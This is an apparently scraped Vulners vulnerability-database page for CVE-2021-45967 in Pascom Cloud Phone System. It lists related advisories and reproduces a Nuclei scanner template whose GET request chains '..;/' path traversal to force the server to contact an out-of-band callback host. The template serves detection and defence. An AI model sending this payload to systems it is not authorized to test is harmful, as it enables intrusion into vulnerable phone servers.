| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2021-45967 | 18 Mar 202205:15 | – | attackerkb | |
| CVE-2021-45967 | 18 Mar 202211:22 | – | circl | |
| Pascom Cloud Phone System 路径遍历漏洞 | 18 Mar 202200:00 | – | cnnvd | |
| Pascom Cloud Phone System Path Traversal Vulnerability | 22 Mar 202200:00 | – | cnvd | |
| CVE-2021-45967 | 18 Mar 202205:00 | – | cve | |
| CVE-2021-45967 | 18 Mar 202205:00 | – | cvelist | |
| CVE-2021-45967 | 18 Mar 202205:15 | – | nvd | |
| BIT-OPENFIRE-2021-45967 | 6 Mar 202410:59 | – | osv | |
| Path traversal | 18 Mar 202205:15 | – | prion | |
| PT-2022-12474 · Pascom +2 · Pascom Cloud Phone System +2 | 18 Mar 202200:00 | – | ptsecurity |
id: CVE-2021-45967
info:
name: Pascom CPS Server-Side Request Forgery
author: dwisiswant0
severity: critical
description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.
impact: |
The vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise.
remediation: |
Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967).
reference:
- https://kerbit.io/research/read/blog/4
- https://www.pascom.net/doc/en/release-notes/
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
- https://www.pascom.net/doc/en/release-notes/pascom19/
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45967
cwe-id: CWE-22
epss-score: 0.208
epss-percentile: 0.97238
cpe: cpe:2.3:a:pascom:cloud_phone_system:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: pascom
product: cloud_phone_system
tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
# digest: 4a0a0047304502203ea56f3e44517bdc85d942dcdd84f097d592d8113058663cac184d382683a7ca022100b604d922bd53b8c8ac8a4a2c39a4d0651bef9e3a318ef1faab8514afb3c6a0e5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation